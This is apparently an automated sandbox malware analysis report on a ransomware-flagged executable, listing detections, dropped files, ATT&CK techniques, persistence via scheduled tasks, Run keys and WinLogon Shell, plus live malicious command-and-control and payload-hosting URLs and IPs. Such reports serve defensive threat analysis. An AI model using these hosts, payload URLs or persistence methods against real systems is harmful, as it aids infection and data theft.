Source: Yara match	File source: 00000018.00000002.1880725474.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.2311289217.0000000002E8A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2208718575.0000000003411000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.1978274690.0000000002351000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.1893760638.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.2540068591.0000000003371000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1725669334.0000000002C38000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1725669334.0000000002B11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1681720996.00000000125CF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2913632595.0000000002E58000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ogVinh0jhq.exe PID: 7456, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 7836, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ogVinh0jhq.exe PID: 7844, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ITlIQtTGhEyfMRHaLp.exe PID: 8036, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ITlIQtTGhEyfMRHaLp.exe PID: 8048, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ogVinh0jhq.exe PID: 7480, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 7456, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ITlIQtTGhEyfMRHaLp.exe PID: 3652, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 1436, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ITlIQtTGhEyfMRHaLp.exe PID: 5696, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 4592, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ITlIQtTGhEyfMRHaLp.exe PID: 6536, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ITlIQtTGhEyfMRHaLp.exe PID: 7640, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	11 Windows Management Instrumentation	1 Scripting	1 DLL Side-Loading	11 Disable or Modify Tools	1 OS Credential Dumping	2 File and Directory Discovery	Remote Services	11 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	12 Process Injection	1 Deobfuscate/Decode Files or Information	11 Input Capture	114 System Information Discovery	Remote Desktop Protocol	3 Data from Local System	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	21 Registry Run Keys / Startup Folder	21 Registry Run Keys / Startup Folder	2 Obfuscated Files or Information	Security Account Manager	1 Query Registry	SMB/Windows Admin Shares	11 Input Capture	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	22 Software Packing	NTDS	211 Security Software Discovery	Distributed Component Object Model	1 Clipboard Data	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	2 Process Discovery	SSH	Keylogging	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	131 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	131 Virtualization/Sandbox Evasion	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	12 Process Injection	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
ogVinh0jhq.exe	79%	ReversingLabs	ByteCode-MSIL.Ransomware.Prometheus
ogVinh0jhq.exe	100%	Avira	HEUR/AGEN.1323984
ogVinh0jhq.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	100%	Avira	HEUR/AGEN.1323984
C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	100%	Avira	HEUR/AGEN.1323984
C:\Users\user\AppData\Local\Temp\TJHXkWh8sx.bat	100%	Avira	BAT/Delbat.C
C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	79%	ReversingLabs	ByteCode-MSIL.Ransomware.Prometheus
C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	79%	ReversingLabs	ByteCode-MSIL.Ransomware.Prometheus

Source	Detection	Scanner	Label
http://f1070307.xsph.ru/	100%	Avira URL Cloud	malware
http://f1070307.xsph.ru	100%	Avira URL Cloud	malware
http://f1070307.xsph.ru/3b39b74d.php?xKlF8KllZirEiSsOnQXHCc8kKL=7O2j5PKlq1uIopZOWJVxmo&faRRxVLB5xenW	100%	Avira URL Cloud	malware
http://f1070307.xsph.ru/3b39b74d.php?CrX=gZ5mjnRizKIjk&376779f86c177c4b75812d1e24e5499c=91232e7e14c7cef9e28ece2cb253607d&6cf4e82f6b2961308157eadafeeff42f=gYldDNkNzM4MjZiVjM1ITN3gTYjRTMiN2Y5kTMlNTZ4M2M3Q2M3Q2M&CrX=gZ5mjnRizKIjk	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
f1070307.xsph.ru	141.8.192.151	true	true		unknown
pastebin.com	104.20.4.235	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://f1070307.xsph.ru/3b39b74d.php?CrX=gZ5mjnRizKIjk&376779f86c177c4b75812d1e24e5499c=91232e7e14c7cef9e28ece2cb253607d&6cf4e82f6b2961308157eadafeeff42f=gYldDNkNzM4MjZiVjM1ITN3gTYjRTMiN2Y5kTMlNTZ4M2M3Q2M3Q2M&CrX=gZ5mjnRizKIjk	true	Avira URL Cloud: malware	unknown
https://pastebin.com/raw/5YGpPGYJ	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://f1070307.xsph.ru/	RuntimeBroker.exe, 00000008.00000002.2913632595.0000000002E4A000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://duckduckgo.com/chrome_newtab	RuntimeBroker.exe, 00000008.00000002.3173879576.0000000013547000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000008.00000002.3173879576.0000000013477000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000008.00000002.3173879576.00000000135C1000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000008.00000002.3173879576.00000000133DF000.00000004.00000800.00020000.00000000.sdmp, DZLVMXtbhJ.8.dr	false		high
http://nuget.org/NuGet.exe	powershell.exe, 00000004.00000002.1939782701.0000026C56206000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2347549043.0000020390076000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2226988178.0000020D10079000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2334590989.000001CEC933A000.00000004.00000800.00020000.00000000.sdmp	false		high
http://f1070307.xsph.ru/3b39b74d.php?xKlF8KllZirEiSsOnQXHCc8kKL=7O2j5PKlq1uIopZOWJVxmo&faRRxVLB5xenW	RuntimeBroker.exe, 00000008.00000002.2913632595.00000000052BB000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://duckduckgo.com/ac/?q=	RuntimeBroker.exe, 00000008.00000002.3173879576.0000000013547000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000008.00000002.3173879576.0000000013477000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000008.00000002.3173879576.00000000135C1000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000008.00000002.3173879576.00000000133DF000.00000004.00000800.00020000.00000000.sdmp, DZLVMXtbhJ.8.dr	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	RuntimeBroker.exe, 00000008.00000002.3173879576.0000000013547000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000008.00000002.3173879576.0000000013477000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000008.00000002.3173879576.00000000135C1000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000008.00000002.3173879576.00000000133DF000.00000004.00000800.00020000.00000000.sdmp, DZLVMXtbhJ.8.dr	false		high
http://f1070307.xsph.ru	RuntimeBroker.exe, 00000008.00000002.2913632595.00000000052BB000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000011.00000002.1778046559.000001CEB94E7000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000004.00000002.1736753439.0000026C463B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1786141828.0000020380228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1760083564.0000020D00227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1778046559.000001CEB94E7000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000011.00000002.1778046559.000001CEB94E7000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.microsoft.co	powershell.exe, 00000005.00000002.2485281587.00000203F3607000.00000004.00000020.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 00000011.00000002.2334590989.000001CEC933A000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.mic	powershell.exe, 00000004.00000002.2056323466.0000026C5E707000.00000004.00000020.00020000.00000000.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 00000011.00000002.2334590989.000001CEC933A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	RuntimeBroker.exe, 00000008.00000002.3173879576.0000000013547000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000008.00000002.3173879576.0000000013477000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000008.00000002.3173879576.00000000135C1000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000008.00000002.3173879576.00000000133DF000.00000004.00000800.00020000.00000000.sdmp, DZLVMXtbhJ.8.dr	false		high
http://www.microsoft.	powershell.exe, 00000010.00000002.2402637553.0000020D7C830000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	RuntimeBroker.exe, 00000008.00000002.3173879576.0000000013547000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000008.00000002.3173879576.0000000013477000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000008.00000002.3173879576.00000000135C1000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000008.00000002.3173879576.00000000133DF000.00000004.00000800.00020000.00000000.sdmp, DZLVMXtbhJ.8.dr	false		high
https://www.ecosia.org/newtab/	RuntimeBroker.exe, 00000008.00000002.3173879576.0000000013547000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000008.00000002.3173879576.0000000013477000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000008.00000002.3173879576.00000000135C1000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000008.00000002.3173879576.00000000133DF000.00000004.00000800.00020000.00000000.sdmp, DZLVMXtbhJ.8.dr	false		high
https://github.com/Pester/Pester	powershell.exe, 00000011.00000002.1778046559.000001CEB94E7000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/Vh5j3k	ogVinh0jhq.exe, 00000000.00000002.1704845134.000000001D884000.00000004.00000020.00020000.00000000.sdmp	false		high
https://aka.ms/odirm	ogVinh0jhq.exe, 00000000.00000002.1704845134.000000001D884000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	RuntimeBroker.exe, 00000008.00000002.3173879576.0000000013547000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000008.00000002.3173879576.0000000013477000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000008.00000002.3173879576.00000000135C1000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000008.00000002.3173879576.00000000133DF000.00000004.00000800.00020000.00000000.sdmp, DZLVMXtbhJ.8.dr	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	RuntimeBroker.exe, 00000008.00000002.3173879576.0000000013547000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000008.00000002.3173879576.0000000013477000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000008.00000002.3173879576.00000000135C1000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000008.00000002.3173879576.00000000133DF000.00000004.00000800.00020000.00000000.sdmp, DZLVMXtbhJ.8.dr	false		high
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000004.00000002.1736753439.0000026C463B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1786141828.0000020380228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1760083564.0000020D00227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1778046559.000001CEB94E7000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 00000011.00000002.2334590989.000001CEC933A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 00000004.00000002.1939782701.0000026C56206000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2347549043.0000020390076000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2226988178.0000020D10079000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2334590989.000001CEC933A000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.micft.cMicRosof	powershell.exe, 00000004.00000002.2056323466.0000026C5E707000.00000004.00000020.00020000.00000000.sdmp	false		high
https://aka.ms/pscore68	powershell.exe, 00000004.00000002.1736753439.0000026C46191000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1786141828.0000020380001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1760083564.0000020D00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1778046559.000001CEB92C1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	ogVinh0jhq.exe, 00000000.00000002.1679368399.00000000027BF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1736753439.0000026C46191000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1786141828.0000020380001000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000008.00000002.2913632595.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp, ogVinh0jhq.exe, 0000000A.00000002.1725669334.0000000002D04000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1760083564.0000020D00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1778046559.000001CEB92C1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.v	powershell.exe, 00000010.00000002.2386879324.0000020D7C6EE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	RuntimeBroker.exe, 00000008.00000002.3173879576.0000000013547000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000008.00000002.3173879576.0000000013477000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000008.00000002.3173879576.00000000135C1000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000008.00000002.3173879576.00000000133DF000.00000004.00000800.00020000.00000000.sdmp, DZLVMXtbhJ.8.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.20.4.235	pastebin.com	United States		13335	CLOUDFLARENETUS	false
141.8.192.151	f1070307.xsph.ru	Russian Federation		35278	SPRINTHOSTRU	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1583534
Start date and time:	2025-01-03 00:26:05 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 19s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	36
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Sample name:	ogVinh0jhq.exe renamed because original name is a hash value
Original Sample Name:	11233270109a3d109a5e332c13c47f86.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@34/42@2/2
EGA Information:	Failed
HCA Information:	Successful, ratio: 63% Number of executed functions: 529 Number of non-executed functions: 37
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, schtasks.exe
Excluded IPs from analysis (whitelisted): 4.175.87.197, 13.107.246.45
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target ITlIQtTGhEyfMRHaLp.exe, PID 3652 because it is empty
Execution Graph export aborted for target ITlIQtTGhEyfMRHaLp.exe, PID 5696 because it is empty
Execution Graph export aborted for target ITlIQtTGhEyfMRHaLp.exe, PID 6536 because it is empty
Execution Graph export aborted for target ITlIQtTGhEyfMRHaLp.exe, PID 7640 because it is empty
Execution Graph export aborted for target ITlIQtTGhEyfMRHaLp.exe, PID 8036 because it is empty
Execution Graph export aborted for target ITlIQtTGhEyfMRHaLp.exe, PID 8048 because it is empty
Execution Graph export aborted for target RuntimeBroker.exe, PID 1436 because it is empty
Execution Graph export aborted for target RuntimeBroker.exe, PID 4592 because it is empty
Execution Graph export aborted for target RuntimeBroker.exe, PID 7456 because it is empty
Execution Graph export aborted for target RuntimeBroker.exe, PID 7836 because it is empty
Execution Graph export aborted for target ogVinh0jhq.exe, PID 7456 because it is empty
Execution Graph export aborted for target ogVinh0jhq.exe, PID 7480 because it is empty
Execution Graph export aborted for target ogVinh0jhq.exe, PID 7844 because it is empty
Execution Graph export aborted for target powershell.exe, PID 7588 because it is empty
Execution Graph export aborted for target powershell.exe, PID 7596 because it is empty
Execution Graph export aborted for target powershell.exe, PID 8112 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: ogVinh0jhq.exe

Simulations

Behavior and APIs

Time	Type	Description
18:26:58	API Interceptor	115x Sleep call for process: powershell.exe modified
18:27:12	API Interceptor	190130x Sleep call for process: RuntimeBroker.exe modified
23:26:57	Task Scheduler	Run new task: RuntimeBroker path: "C:/Users/user/AppData/Local/Microsoft/Windows/Explorer\RuntimeBroker.exe"
23:26:57	Task Scheduler	Run new task: RuntimeBrokerR path: "C:/Users/user/AppData/Local/Microsoft/Windows/Explorer\RuntimeBroker.exe"
23:26:59	Task Scheduler	Run new task: ITlIQtTGhEyfMRHaLp path: "C:/Users/user/AppData/Local/Microsoft/Windows/Explorer\ITlIQtTGhEyfMRHaLp.exe"
23:26:59	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run RuntimeBroker "C:/Users/user/AppData/Local/Microsoft/Windows/Explorer\RuntimeBroker.exe"
23:27:00	Task Scheduler	Run new task: ITlIQtTGhEyfMRHaLpI path: "C:/Users/user/AppData/Local/Microsoft/Windows/Explorer\ITlIQtTGhEyfMRHaLp.exe"
23:27:08	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run ITlIQtTGhEyfMRHaLp "C:/Users/user/AppData/Local/Microsoft/Windows/Explorer\ITlIQtTGhEyfMRHaLp.exe"
23:27:16	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run RuntimeBroker "C:/Users/user/AppData/Local/Microsoft/Windows/Explorer\RuntimeBroker.exe"
23:27:25	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run ITlIQtTGhEyfMRHaLp "C:/Users/user/AppData/Local/Microsoft/Windows/Explorer\ITlIQtTGhEyfMRHaLp.exe"
23:27:33	Autostart	Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run RuntimeBroker "C:/Users/user/AppData/Local/Microsoft/Windows/Explorer\RuntimeBroker.exe"
23:27:41	Autostart	Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run ITlIQtTGhEyfMRHaLp "C:/Users/user/AppData/Local/Microsoft/Windows/Explorer\ITlIQtTGhEyfMRHaLp.exe"
23:27:58	Autostart	Run: WinLogon Shell explorer.exe
23:28:06	Autostart	Run: WinLogon Shell "C:/Users/user/AppData/Local/Microsoft/Windows/Explorer\RuntimeBroker.exe"
23:28:14	Autostart	Run: WinLogon Shell "C:/Users/user/AppData/Local/Microsoft/Windows/Explorer\ITlIQtTGhEyfMRHaLp.exe"

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.20.4.235	gabe.ps1	Get hash	malicious	Unknown	Browse	pastebin.com/raw/sA04Mwk2
	cr_asm_crypter.ps1	Get hash	malicious	Unknown	Browse	pastebin.com/raw/sA04Mwk2
	vF20HtY4a4.exe	Get hash	malicious	Unknown	Browse	pastebin.com/raw/sA04Mwk2
	OSLdZanXNc.exe	Get hash	malicious	Unknown	Browse	pastebin.com/raw/sA04Mwk2
	gaber.ps1	Get hash	malicious	Unknown	Browse	pastebin.com/raw/sA04Mwk2
	cr_asm_crypter.ps1	Get hash	malicious	Unknown	Browse	pastebin.com/raw/sA04Mwk2
	sostener.vbs	Get hash	malicious	Njrat	Browse	pastebin.com/raw/V9y5Q5vv
	sostener.vbs	Get hash	malicious	XWorm	Browse	pastebin.com/raw/V9y5Q5vv
	envifa.vbs	Get hash	malicious	Remcos	Browse	pastebin.com/raw/V9y5Q5vv
	New Voicemail Invoice 64746w .js	Get hash	malicious	WSHRAT	Browse	pastebin.com/raw/NsQ5qTHr
141.8.192.151	updater.exe	Get hash	malicious	Panda Stealer	Browse	f0837288.xsph.ru/collect.php
	updater.exe	Get hash	malicious	Panda Stealer	Browse	f0837288.xsph.ru/collect.php
	ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe	Get hash	malicious	Azorult	Browse	f0355889.xsph.ru/Panel/index.php
	gOKMPhOLiN.exe	Get hash	malicious	Phoenix Miner, ccminer	Browse	f0758246.xsph.ru//zima.php?mine=ETC
	DWG Material, Standard BS 4360 GR. 40A43A.jar	Get hash	malicious	Unknown	Browse	f0719949.xsph.ru/dropbox.exe
	DWG Material, Standard BS 4360 GR. 40A43A.jar	Get hash	malicious	Unknown	Browse	f0719949.xsph.ru/dropbox.exe
	dropbox.exe	Get hash	malicious	Unknown	Browse	f0719949.xsph.ru/Uuddcmhnxqhfgvscgvechrthfvxthbvnjytchegfrhvbrtgnthyfgnbvgfcfbhgfyuyuyuyuyuyuytttrrrfgh
	DWG spare parts 455RTMGF Model.exe	Get hash	malicious	Remcos	Browse	f0719949.xsph.ru/Uuddcmhnxqhfgvscgvechrthfvxthbvnjytchegfrhvbrtgnthyfgnbvgfcfbhgfyuyuyuyuyuyuytttrrrfgh
	NotaFiscal.msi	Get hash	malicious	Unknown	Browse	f0717271.xsph.ru/serv.php
	Revised sales contract for Crosswear.rtf	Get hash	malicious	Snake Keylogger	Browse	f0705964.xsph.ru/mum.exe

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
pastebin.com	hiwA7Blv7C.exe	Get hash	malicious	Xmrig	Browse	172.67.19.24
	CRf9KBk4ra.exe	Get hash	malicious	DCRat	Browse	172.67.19.24
	dF66DKQP7u.exe	Get hash	malicious	XWorm	Browse	104.20.3.235
	2QaN4hOyJs.exe	Get hash	malicious	XWorm	Browse	104.20.3.235
	bad.txt	Get hash	malicious	AsyncRAT	Browse	104.20.3.235
	dlhost.exe	Get hash	malicious	XWorm	Browse	104.20.4.235
	htkeUc1zJ0.exe	Get hash	malicious	Unknown	Browse	104.20.4.235
	c2.exe	Get hash	malicious	Xmrig	Browse	104.20.4.235
	Instruction_695-18112-002_Rev.PDF.lnk (2).d.lnk	Get hash	malicious	Unknown	Browse	172.67.19.24
	RdLfpZY5A9.exe	Get hash	malicious	77Rootkit, XWorm	Browse	104.20.4.235

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	https://myburbank-uat.3didemo.com	Get hash	malicious	HTMLPhisher	Browse	104.26.13.57
	hiwA7Blv7C.exe	Get hash	malicious	Xmrig	Browse	172.67.19.24
	http://hotelyetipokhara.com	Get hash	malicious	Unknown	Browse	104.21.96.1
	https://realpaperworks.com/wp-content/red/UhPIYa	Get hash	malicious	Unknown	Browse	104.21.96.1
	http://adflowtube.com	Get hash	malicious	Unknown	Browse	188.114.96.3
	http://authmycookie.com	Get hash	malicious	Unknown	Browse	172.67.198.196
	http://keywestlending.com	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	172.64.154.248
	http://vaporblastingservices.com	Get hash	malicious	Unknown	Browse	104.18.26.193
	file.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	file.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
SPRINTHOSTRU	wg9872yUED.exe	Get hash	malicious	DCRat	Browse	141.8.192.164
	CRf9KBk4ra.exe	Get hash	malicious	DCRat	Browse	141.8.192.164
	5Ixz5yVfS7.exe	Get hash	malicious	DCRat	Browse	141.8.192.151
	rWjaZEKha8.exe	Get hash	malicious	DCRat	Browse	141.8.197.42
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, PureLog Stealer, Stealc	Browse	185.185.71.170
	aweqG2ssAY.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	185.185.71.170
	vOizfcQSGf.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	185.185.71.170
	EnoSY3z6MP.exe	Get hash	malicious	Cryptbot	Browse	185.185.71.170
	vH7JfdNi3c.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	185.185.71.170
	U6mwWZlkzH.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	185.185.71.170

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	Sylacauga AL License.msg	Get hash	malicious	Unknown	Browse	104.20.4.235
	https://www.gazeta.ru/politics/news/2024/12/22/24684854.shtml	Get hash	malicious	HTMLPhisher	Browse	104.20.4.235
